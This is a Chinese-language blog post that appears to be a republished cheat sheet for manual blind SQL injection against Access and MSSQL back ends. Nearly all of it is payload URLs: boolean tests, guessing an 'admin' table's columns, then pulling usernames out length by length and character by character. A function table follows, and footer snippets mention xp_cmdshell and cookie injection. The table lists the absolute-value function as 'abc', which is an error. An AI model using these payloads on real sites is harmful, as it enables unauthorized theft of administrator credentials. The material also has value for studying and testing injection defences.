`

sql检测可否注入

    博客分类:
  • php5
阅读更多

 检测可否注入
============================================================ ==================
http://url/xx?id=1111 and 1=1 (正常页面)
http://url/xx?id=1111 and 1=2 (出错页面)

============================================================ ==================
□ 检测表段的
============================================================ ==================
http://url/xx?id=1111 and exists (select * from admin)

============================================================ ==================
□ 检测字段的
============================================================ ==================
http://url/xx?id=1111 and exists (select username from admin)

============================================================ ==================
□ 检测ID
============================================================ ==================
http://url/xx?id=1111 and exists (select id from admin where ID=1)

============================================================ ==================
□ 检测长度的
============================================================ ==================
http://url/xx?id=1111 and exists (select id from admin where len(username)=5 and ID=1)

============================================================ ==================
□ 检测长度的
============================================================ ==================
http://url/xx?id=1111 and exists (select id from admin where len(username)=5 and ID=1)

============================================================ ==================
□ 检测是否为MSSQL数据库
============================================================ ==================
http://url/xx?id=1111 and exists (select * from sysobjects)

============================================================ ==================
□ 检测是否为英文
============================================================ ==================
(ACCESS数据库)
http://url/xx?id=1111 and exists (select id from admin where asc(mid(username,1,1)) between 30 and 130 and ID=1)

(MSSQL数据库)
http://url/xx?id=1111 and exists (select id from admin where unicode(substring(username,1,1)) between 30 and 130 and ID=1)


============================================================ ==================
□ 检测英文的范围
============================================================ ==================
(ACCESS数据库)
http://url/xx?id=1111 and exists (select id from admin where asc(mid(username,1,1)) between 90 and 100 and ID=1)

(MSSQL数据库)
http://url/xx?id=1111 and exists (select id from admin where unicode(substring(username,1,1)) between 90 and 100 and ID=1)

============================================================ ==================
□ 检测那个字符
============================================================ ==================
(ACCESS数据库)
http://url/xx?id=1111 and exists (select id from admin where asc(mid(username,1,1))=97 and ID=1)

(MSSQL数据库)
http://url/xx?id=1111 and exists (select id from admin where unicode(substring(username,1,1))=97 and ID=1)

 

============================================================ ===================
常用函数
============================================================ ===================
Access:asc(字符) SQLServer:unicode(字符)
作用:返回某字符的ASCII码

Access:chr(数字) SQLServer:nchar(数字)
作用:与asc相反,根据ASCII码返回字符

Access:mid(字符串,N,L) SQLServer:substring(字符串,N,L)
作用:返回字符串从N个字符起长度为L的子字符串,即N到N+L之间的字符串

Access:abc(数字) SQLServer:abc (数字)
作用:返回数字的绝对值(在猜解汉字的时候会用到)

Access:A between B And C SQLServer:A between B And C
作用:判断A是否界于B与C之间

分享到:
评论

相关推荐

    SQL注入手工检测sql注入检测

    检测可否注入 首先,我们需要确定Web应用是否易受SQL注入攻击。可以通过在URL参数中添加SQL语句来测试这一点。如果Web应用对这些输入没有正确处理,则可能存在漏洞。 **示例**: ``` http://url/xx?id=1111;and;...

    cookie中转sql攻击

    - **检测工具**:介绍或推荐一些用于检测SQL注入或Cookie安全性的工具,帮助开发者检查和修复潜在问题。 【压缩包子文件的文件名称列表】: 1. **超级小旋风AspWebServer1.0.exe**:这可能是一个轻量级的ASP...

    基于Petri网理论的SQL注入行为分析.pdf

    这在分析SQL注入攻击中也很重要,因为它可以帮助我们检测到攻击者是否通过特定的操作序列,始终能够绕过安全机制,持续执行恶意操作。 除了状态可达性和公平性之外,Petri网中的同步距离也是一个重要概念。同步距离...

    SQL查询安全性及性能优化

    - **检测注入点**:通过尝试简单的SQL注入语句来判断是否存在漏洞。例如,在输入参数中添加“or 1=1”等条件,如果结果异常,则可能存在可利用的注入点。 - **利用系统过程**:利用特定数据库的功能,如`xp_cmdshell...

    通过url地址检测该站点能否正常登录

    输入验证是否有效,防止SQL注入等;以及是否使用安全的cookie设置(如HttpOnly和Secure标志)。 8. **异常情况**:网络中断、服务器负载过高或服务器维护等情况也可能影响登录。测试应包含这些异常场景,确保网站在...

    sql关键词脚本检查正则表达式的方法

    在上述描述中,提到了一个Java方法`containsSqlInjection`,它使用正则表达式来检测输入字符串中是否存在SQL关键词。这个方法的关键在于正则表达式: ```java Pattern.compile("\\b(and|exec|insert|select|drop|...

    网站的安全测试建议

    - **SQL注入**:检测是否存在SQL注入漏洞。 - **会话管理**:检测会话固定(session fixation)和其他会话管理问题。 #### 三、免费的Web安全检测工具推荐 除了Nikto和AppScan之外,还有一些其他的免费Web安全检测...

    apitable 检测

    WebScan安全检测API不仅帮助开发者发现潜在的安全问题,如SQL注入、跨站脚本攻击等,还确保了整个过程遵循了行业标准和法规,保护了用户的隐私和数据安全。同时,通过这样的合作流程,奇虎科技有限公司能够有效地...

    代码安全系统性检测指导要求规范1109.2010.docx

    - 应用程序可能遭受SQL注入、XSS攻击、OS注入、Cookie操纵等威胁。 - 不安全的输入输出处理、数据泄露、不恰当的身份验证和授权可能导致安全漏洞。 - 缓冲区溢出、字符串格式化漏洞和优先级提升漏洞也是常见安全...

    最新IPS和漏洞扫描配置收藏

    例如,针对SQL注入攻击,你需要配置相应的签名来检测HTTP流量中的可疑SQL语句。 漏洞扫描则是系统地检测网络上的设备,查找安全弱点的过程。在思科设备上配置漏洞扫描,你需要注意: 1. **扫描设置**:设定扫描...

    web安全性测试用例基础

    它涉及到多个方面,包括输入验证、输出编码、防止SQL注入、防止跨站脚本攻击(XSS)、防御跨站请求伪造(CSRF)以及识别可能导致Web站点崩溃的问题。下面将详细讨论这些测试用例。 1. 输入验证: 输入验证是防止...

    检测网站查看有无bug

    4. 安全测试:确保网站的安全性,防止SQL注入、跨站脚本攻击(XSS)、跨站请求伪造(CSRF)等。此外,还应检查数据加密、用户隐私保护以及服务器安全配置。 5. 压力测试:模拟大量用户同时访问,以测试网站的抗压能力。...

    F5 ASM应用安全管理测试方案.docx

    测试将涵盖字符串、数字和语句型SQL注入,以及利用Database Backdoors进行攻击的场景,以验证ASM能否有效阻止这些威胁。 2. 防command injection攻击:command injection允许攻击者执行非预期的系统命令,测试会...

    漏洞报告模板.docx

    示例:“SQL注入漏洞是指攻击者通过构造恶意SQL语句插入到应用程序的输入字段中,绕过正常的输入验证逻辑,从而实现对数据库的非法操作。” ##### 2.3 危害程度 评估漏洞可能带来的风险等级,通常分为高、中、低三...

    数据库测试概述-数据库测试入门资料

    3. **安全测试工具**:市面上有许多专门针对SQL注入等安全漏洞的检测工具,可以帮助开发者进行安全性评估。 #### 五、数据库测试人员的要求 1. **了解数据库特性**:测试人员需要熟悉不同类型的数据库管理系统及其...

    网上书店系统 ASP.net

    1. 功能测试:验证所有功能模块是否正常工作,如用户能否顺利购书、管理员能否有效管理等。 2. 性能测试:模拟高并发场景,检查系统处理能力和响应时间。 3. 安全性测试:检测系统的安全性,如输入验证、数据保护等...

    一种基于CPS的网络安全体系设计与研究.pdf

    在网络安全领域,常见的攻击方式包括但不限于SQL注入、病毒感染、IP欺骗、SYN泛洪攻击、ACK泛洪攻击、UDP泛洪攻击和连接泛洪攻击等。这些攻击不仅针对传统计算机网络,而且对CPS系统造成了巨大威胁。例如,通过SQL...

    科来数据包

    "科来数据包"中的内容可能包括了各种常见的网络攻击类型,如拒绝服务(DoS)、分布式拒绝服务(DDoS)、扫描攻击、木马病毒、后门程序、SQL注入、跨站脚本(XSS)等。这些模拟攻击有助于测试IPS/IDS对不同攻击手法的...

Global site tag (gtag.js) - Google Analytics